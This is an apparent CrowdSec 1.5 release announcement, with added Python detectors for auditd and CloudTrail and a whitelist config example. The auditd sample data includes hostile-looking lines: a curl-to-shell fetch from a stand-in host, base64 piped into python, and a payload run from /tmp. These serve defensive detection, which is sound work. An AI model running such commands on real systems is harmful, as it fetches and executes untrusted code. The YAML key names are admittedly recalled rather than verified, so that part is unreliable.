
CrowdSec 1.5 arriving this summer – be the first to test it out now!

We are excited to share that CrowdSec 1.5 will be released in July with a large set of new features and capabilities. Before the full launch, we will share the beta version on April 1st with some of our community members so they can test the biggest CrowdSec release since 1.0. Take a look at what this version contains; at the bottom of the page you can ask to be one of the first to try it out.

Polling API Integration

With the polling API, each Security Engine polls the Console for orders, so the Console can now push instructions to your CrowdSec instances without any inbound connection to them. This lets users manage their decisions (the IPs banned at a given time) centrally. Let's dive into what that means.

Real-time decisions management

This is very useful for users running many instances. For example, if you have 500 instances and want to ban an IP on all of them, you would typically need some automation, such as a script that talks to each one. Now you can do it from a single Console page.

Teaser: securely push custom configuration to a fleet of instances from the Console

In the future, the polling API feature will allow users to set up parsers and scenarios directly from the CrowdSec Console.

New Blocklist API

We recently announced external IP blocklists, which let all Console users subscribe to at least 2 third-party blocklists selected by our expert team, plus 3 premium blocklists for Enterprise users. We have since gathered a large amount of additional data and used it to build bigger blocklists. The blocklists are more robust and subscribing to them has no performance impact.

Kubernetes audit acquisition

The feature we presented at KubeHuddle UK 2022 is finally here:

We could already protect services running inside Kubernetes; now we can also detect malicious behaviour at the cluster level by consuming the API server audit log: privileged pod creation, exec into a pod, mounting a sensitive host path, anonymous API access, API brute force, etc.

S3 audit acquisition

CrowdSec now supports reading logs stored in an S3 bucket, so you can process logs generated by AWS services that deliver to S3 (such as ALB access logs or CloudFront logs).

Auditd support

Enables detection of post-exploitation behaviours on the host, including:

  • base64 + interpreter (perl/bash/python)
  • curl/wget and exec
  • pkill execve bursts
  • rm execve bursts
  • exec from suspicious locations
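The list above mixes two kinds of rule: single-event patterns (an interpreter fed by base64, a download piped into a shell, a binary run from a scratch directory) and rate rules (bursts of pkill or rm). As an added illustration that is not CrowdSec's own auditd parser or scenarios, the Python below parses raw auditd EXECVE records and implements both shapes; the burst rules use a leaky bucket with a capacity and a leak speed, which is the model CrowdSec scenarios are built on. The audit lines, thresholds and rule names are constructed for the example.

```python
"""Toy post-exploitation detector over raw auditd EXECVE records.

Added illustration, not CrowdSec's own auditd parser or scenarios.
Single-event pattern rules and leaky-bucket burst rules are shown;
thresholds and sample lines are constructed, not taken from a real host.
"""
import os
import re

# Native auditd EXECVE layout: type=EXECVE msg=audit(<epoch>:<serial>): argc=N a0="..." a1="..."
LINE_RE = re.compile(r'type=EXECVE msg=audit\((\d+\.\d+):(\d+)\):(.*)')
ARG_RE = re.compile(r'a(\d+)="([^"]*)"')

INTERPRETERS = ("bash", "sh", "perl", "python", "python3")
SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# Hypothetical burst thresholds: binary -> (capacity, seconds per leaked unit)
BURST_RULES = {"rm": (4, 10.0), "pkill": (4, 10.0)}

# Constructed lines. The SYSCALL record is there only to show that records
# of other types are ignored (a real pipeline would join it for uid/pid).
SAMPLE_LINES = [
    'type=SYSCALL msg=audit(1700000000.100:101): arch=c000003e syscall=59 success=yes exit=0 uid=1000',
    'type=EXECVE msg=audit(1700000000.100:101): argc=3 a0="bash" a1="-c" a2="echo aGk= | base64 -d | python3"',
    'type=EXECVE msg=audit(1700000000.200:102): argc=3 a0="sh" a1="-c" a2="curl -s http://example.invalid/x.sh | sh"',
    'type=EXECVE msg=audit(1700000000.300:103): argc=1 a0="/tmp/.hidden/payload"',
    'type=EXECVE msg=audit(1700000000.400:104): argc=2 a0="ls" a1="-la"',
] + [
    # six rm executions half a second apart: a burst
    f'type=EXECVE msg=audit({1700000001 + 0.5 * i:.3f}:{201 + i}): argc=3 a0="rm" a1="-f" a2="/var/log/f{i}"'
    for i in range(6)
]


def parse_execve(line):
    """Return (timestamp, serial, argv) for an EXECVE record, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, serial, rest = float(m.group(1)), int(m.group(2)), m.group(3)
    argv = [v for _, v in sorted((int(i), v) for i, v in ARG_RE.findall(rest))]
    return ts, serial, argv


def pattern_rules(argv):
    """Single-event rules; returns the names of the rules that match."""
    cmd = " ".join(argv)
    hits = []
    if "base64" in cmd and any(re.search(rf"\b{re.escape(i)}\b", cmd) for i in INTERPRETERS):
        hits.append("base64-to-interpreter")
    if re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", cmd):
        hits.append("curl-wget-exec")
    if argv and argv[0].startswith(SUSPICIOUS_DIRS):
        hits.append("exec-from-suspicious-location")
    return hits


class LeakyBucket:
    """Each event pours one unit in; units drain at one per leak_seconds.
    Overflowing the capacity is the alert, after which the bucket resets."""

    def __init__(self, capacity, leak_seconds):
        self.capacity, self.leak_seconds = capacity, leak_seconds
        self.level, self.last_ts = 0.0, None

    def pour(self, ts):
        if self.last_ts is not None:
            self.level = max(0.0, self.level - (ts - self.last_ts) / self.leak_seconds)
        self.last_ts = ts
        self.level += 1
        if self.level > self.capacity:
            self.level = 0.0
            return True
        return False


def detect(lines):
    """Run both rule kinds over raw lines; returns [(serial, rule_name), ...]."""
    alerts, buckets = [], {}
    for line in lines:
        rec = parse_execve(line)
        if rec is None:
            continue
        ts, serial, argv = rec
        for rule in pattern_rules(argv):
            alerts.append((serial, rule))
        exe = os.path.basename(argv[0]) if argv else ""
        if exe in BURST_RULES:
            bucket = buckets.setdefault(exe, LeakyBucket(*BURST_RULES[exe]))
            if bucket.pour(ts):
                alerts.append((serial, f"{exe}-execve-burst"))
    return alerts


if __name__ == "__main__":
    for serial, rule in detect(SAMPLE_LINES):
        print(f"audit serial {serial}: {rule}")
```

Two caveats worth carrying into any real scenario: auditd hex-encodes arguments containing spaces or quotes (the quoted form above is the simple case), and bursts should be keyed on the acting uid or session from the matching SYSCALL record rather than globally, or one noisy cron job will mask a second user's activity.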

CrowdSec CTI API helpers

Query the CTI from parsers and scenarios and react differently based on an IP's reputation, its classification, and/or whether it is a known false positive.

This new CTI API makes CrowdSec and the CTI far more interactive, giving users much more information on a given IP: what the machine is doing, how it is being used, and what attacks it has been reported for. CrowdSec can now query this data in real time, which helps users spot false positives and reduces alert fatigue.

This alert-fatigue reduction applies not only in the Console but also in your own tooling: an alert is sent only once for a given malicious IP, along with our confidence in the activity attributed to it.

AWS CloudTrail scenarios

Thanks to the new behaviour detection capabilities in 1.5, we were able to build an advanced set of AWS CloudTrail scenarios to help you detect and better understand what is happening in your cloud:

  • Detect AWS CloudTrail configuration change
  • Detect AWS Config configuration change
  • Detect AWS console authentication failure
  • Detect AWS IAM policy change
  • Detect AWS KMS key deletion
  • Detect login without MFA to the AWS console
  • Detect AWS NACL change
  • Detect AWS Network Gateway change
  • Detect AWS root account usage
  • Detect AWS route table change
  • Detect AWS S3 bucket policy change
  • Detect AWS Security Group change
  • Detect AWS API unauthorized calls
  • Detect AWS VPC change
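Most of the detections listed above are per-event rules over CloudTrail's JSON: a service (`eventSource`), an action (`eventName`), who did it (`userIdentity`) and whether it failed (`errorCode`). As an added example that is not CrowdSec's scenario code, the Python below evaluates a subset of them over a constructed CloudTrail delivery file (a JSON object with a `Records` array). The predicates follow the widely published CIS AWS Foundations Benchmark metric filters; the records, event IDs and user names are made up for the example.

```python
"""Per-event CloudTrail rules for a subset of the detections listed above.

Added example, not CrowdSec's scenarios. Predicates follow the CIS AWS
Foundations Benchmark metric filters; records are constructed (hypothetical
IDs, no real account data).
"""
import json

# Constructed CloudTrail delivery file: {"Records": [event, ...]}
SAMPLE_TRAIL = json.dumps({"Records": [
    {"eventID": "ev-1", "eventType": "AwsConsoleSignIn", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "additionalEventData": {"MFAUsed": "No"}, "responseElements": {"ConsoleLogin": "Success"}},
    {"eventID": "ev-2", "eventType": "AwsConsoleSignIn", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "userIdentity": {"type": "IAMUser", "userName": "alice"},
     "responseElements": {"ConsoleLogin": "Failure"}, "errorMessage": "Failed authentication"},
    {"eventID": "ev-3", "eventType": "AwsApiCall", "eventSource": "cloudtrail.amazonaws.com",
     "eventName": "StopLogging", "userIdentity": {"type": "Root"},
     "requestParameters": {"name": "main-trail"}, "responseElements": None},
    {"eventID": "ev-4", "eventType": "AwsApiCall", "eventSource": "ec2.amazonaws.com",
     "eventName": "DescribeInstances", "userIdentity": {"type": "IAMUser", "userName": "bob"},
     "errorCode": "Client.UnauthorizedOperation", "responseElements": None},
    {"eventID": "ev-5", "eventType": "AwsApiCall", "eventSource": "kms.amazonaws.com",
     "eventName": "ScheduleKeyDeletion", "userIdentity": {"type": "AssumedRole"}},
    {"eventID": "ev-6", "eventType": "AwsApiCall", "eventSource": "s3.amazonaws.com",
     "eventName": "ListBuckets", "userIdentity": {"type": "IAMUser", "userName": "alice"}},
]})

CLOUDTRAIL_CONFIG = {"CreateTrail", "UpdateTrail", "DeleteTrail", "StartLogging",
                     "StopLogging", "PutEventSelectors"}
IAM_POLICY = {"PutUserPolicy", "PutGroupPolicy", "PutRolePolicy", "CreatePolicy", "DeletePolicy",
              "CreatePolicyVersion", "DeletePolicyVersion", "AttachRolePolicy", "DetachRolePolicy",
              "AttachUserPolicy", "DetachUserPolicy", "AttachGroupPolicy", "DetachGroupPolicy"}
KMS_DELETE = {"DisableKey", "ScheduleKeyDeletion"}
S3_POLICY = {"PutBucketAcl", "PutBucketPolicy", "DeleteBucketPolicy", "PutBucketCors", "DeleteBucketCors"}
SEC_GROUP = {"AuthorizeSecurityGroupIngress", "AuthorizeSecurityGroupEgress", "RevokeSecurityGroupIngress",
             "RevokeSecurityGroupEgress", "CreateSecurityGroup", "DeleteSecurityGroup"}


def _src(e, service):
    return e.get("eventSource") == f"{service}.amazonaws.com"


def _identity(e):
    return e.get("userIdentity") or {}


def _console_result(e):
    # responseElements is frequently null in CloudTrail, hence `or {}` rather than a default arg
    return (e.get("responseElements") or {}).get("ConsoleLogin")


RULES = [
    ("cloudtrail-config-change", lambda e: _src(e, "cloudtrail") and e.get("eventName") in CLOUDTRAIL_CONFIG),
    ("console-auth-failure", lambda e: e.get("eventName") == "ConsoleLogin" and _console_result(e) == "Failure"),
    ("console-login-without-mfa", lambda e: e.get("eventName") == "ConsoleLogin"
        and _console_result(e) == "Success"
        and (e.get("additionalEventData") or {}).get("MFAUsed") != "Yes"
        and _identity(e).get("type") == "IAMUser"),
    ("iam-policy-change", lambda e: _src(e, "iam") and e.get("eventName") in IAM_POLICY),
    ("kms-key-deletion", lambda e: _src(e, "kms") and e.get("eventName") in KMS_DELETE),
    ("root-account-usage", lambda e: _identity(e).get("type") == "Root"
        and "invokedBy" not in _identity(e)            # service-initiated calls carry invokedBy
        and e.get("eventType") != "AwsServiceEvent"),
    ("s3-bucket-policy-change", lambda e: _src(e, "s3") and e.get("eventName") in S3_POLICY),
    ("security-group-change", lambda e: _src(e, "ec2") and e.get("eventName") in SEC_GROUP),
    ("unauthorized-api-call", lambda e: (e.get("errorCode") or "").endswith("UnauthorizedOperation")
        or (e.get("errorCode") or "").startswith("AccessDenied")),
]


def evaluate(event):
    """Names of all rules matching one CloudTrail event, in RULES order."""
    return [name for name, pred in RULES if pred(event)]


def scan(trail_json):
    """Evaluate a delivery file; returns [(eventID, [rule, ...]), ...] for events with hits."""
    results = []
    for event in json.loads(trail_json)["Records"]:
        hits = evaluate(event)
        if hits:
            results.append((event["eventID"], hits))
    return results


if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_TRAIL):
        print(event_id, ", ".join(hits))
```

The NACL, route table, VPC, network gateway and AWS Config rules in the list have the same shape (an `eventSource` of `ec2.amazonaws.com` or `config.amazonaws.com` and a set of `eventName` values), while "console authentication failure" only becomes a brute-force signal when counted per source IP over a time window, which needs a stateful bucket rather than a per-event predicate.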

Feature flag support

This new feature lets us ship some Security Engine capabilities disabled by default, to be activated manually by the user.

This makes it safer to include beta features in a release, gives the community more opportunities to preview what is coming, and helps us test new features across diverse use cases.

Detection Engine improvements

  • Conditional buckets: an improvement to our behaviour detection system that allows more complex expressions in the alert-triggering condition
  • Event data stash: lets parsers capture data from one event for later enrichment of others, adding the ability to detect more advanced malicious behaviours

CAPI Whitelist

While the community blocklist is highly curated and designed to avoid false positives, a shared IP used by both innocent and malicious actors will occasionally end up in it, so we have added the ability to create whitelists that also apply to the community blocklist.
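The page does not show the file format. The fragment below is an added example of how a CAPI whitelist is wired up in 1.5 as this editor recalls it from the configuration reference, not something taken from the page: a `capi_whitelists_path` entry under `api.server` in `config.yaml` pointing at a YAML file with `ips` and `cidrs` lists. Verify the key names against your installed version's documentation and `cscli`; the addresses are RFC 5737 test ranges standing in for a real shared egress IP.

```yaml
# /etc/crowdsec/capi_whitelists.yaml (example entries, TEST-NET addresses)
ips:
  - 203.0.113.10          # shared NAT egress of a partner office
cidrs:
  - 198.51.100.0/24       # CDN / carrier-grade NAT range shared by many tenants
---
# excerpt of /etc/crowdsec/config.yaml: reference the file from the local API server
api:
  server:
    capi_whitelists_path: /etc/crowdsec/capi_whitelists.yaml
```

This whitelist filters decisions received from the community blocklist only; if the same shared IP trips one of your own scenarios locally, that still needs a regular parser-stage whitelist, which is the right split: a CGNAT range you cannot afford to block on reputation alone may still deserve a short local ban when it actively brute-forces you.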

Conclusion

We are rolling out the beta version on April 1st to a handful of our community members. If you are interested in being one of the first to test it and give us feedback, contact us! All testers will get 2 months of every new feature, premium ones included, free of charge, as thanks for helping us with this new version.
